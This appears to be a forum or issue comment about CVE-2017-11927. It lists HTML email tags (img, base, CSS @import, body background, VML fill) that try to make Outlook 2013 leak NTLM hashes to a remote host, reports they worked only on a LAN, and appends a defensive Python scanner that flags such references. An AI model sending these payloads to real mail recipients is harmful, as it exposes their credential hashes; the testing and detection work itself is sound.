You are saying:
According to MSRC, the CVE-2017-11927 [2] (that was not released initially as a result of our report) had rectified some of the payloads. This patch was updated in May 2018 to address the remaining issues that were included in this report.
So I tried with a 3-year-old unpatched Outlook 2013 to use these tags in an email:
Image tag:
<img src="//example.com/anon/test.txt" >
Base tag + image tag:
<base href="//example.com/IDontExist/">
<img>
Style tag:
<style>
@import 'its:/example.com/foo1/test';
@import url(its:/example.com/foo2/test);
</style>
Body tag (Image):
<body background="its:/example.com/IDontExistNew/foobar">
Input tag (Image):
<input type="image" src="its:/example.com/IDontExistNew/foobar" name="test" value="test">
Link tag (Style):
<link rel="stylesheet" href="its:/example.com/IDontExistNew/foobar" />
VML tag (Image):
<v:background xmlns:v="urn:schemas-microsoft-com:vml">
<v:fill src="its:/example.com/IDontExistNew/foobar" />
</v:background>
None of them are sending NTLM hashes over the public network; they just seem to work on the LAN only.
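A defensive check for the tag list in the post above, as an added example that is not part of the original issue: it scans an HTML mail body for the same attribute and `@import` positions and flags references whose prefix matches the ones in the post. The function and class names, the benign `cid:` and `https:` sample references, and the extra `\\` and `file:` prefixes are assumptions.

```python
import re
from html.parser import HTMLParser

# Prefixes used by the references in the post; "\\" (UNC) and "file:" are added assumptions.
RISKY_PREFIXES = ("//", "its:", "\\\\", "file:")
URL_ATTRS = {"src", "href", "background"}
# Matches @import 'x', @import "x" and @import url(x)
CSS_IMPORT = re.compile(r"@import\s+(?:url\(\s*)?['\"]?([^'\")\s;]+)", re.I)

# Constructed sample body: the post's example.com references plus two benign ones.
SAMPLE = """<base href="//example.com/IDontExist/"><img src="cid:logo123">
<style>
@import 'its:/example.com/foo1/test';
@import url(its:/example.com/foo2/test);
</style>
<body background="its:/example.com/IDontExistNew/foobar">
<link rel="stylesheet" href="https://example.com/site.css" />
<v:background xmlns:v="urn:schemas-microsoft-com:vml">
<v:fill src="its:/example.com/IDontExistNew/foobar" /></v:background>"""

def is_risky(url):
    return url.strip().lower().startswith(RISKY_PREFIXES)

class RemoteRefScanner(HTMLParser):
    """Collects (tag, attribute, url) for references with a risky prefix."""
    def __init__(self):
        super().__init__()
        self.findings, self._in_style = [], False

    def handle_starttag(self, tag, attrs):
        self._in_style = self._in_style or tag == "style"
        for name, value in attrs:
            if name in URL_ATTRS and value and is_risky(value):
                self.findings.append((tag, name, value))

    def handle_endtag(self, tag):
        if tag == "style":
            self._in_style = False

    def handle_data(self, data):
        if self._in_style:  # CSS text: look for @import targets
            self.findings += [("style", "@import", u)
                              for u in CSS_IMPORT.findall(data) if is_risky(u)]

def scan_html(body):
    scanner = RemoteRefScanner()
    scanner.feed(body)
    scanner.close()
    return scanner.findings
```

`scan_html(SAMPLE)` returns five findings (base, two `@import` lines, body background, `v:fill`) and leaves the `cid:` and `https:` references alone.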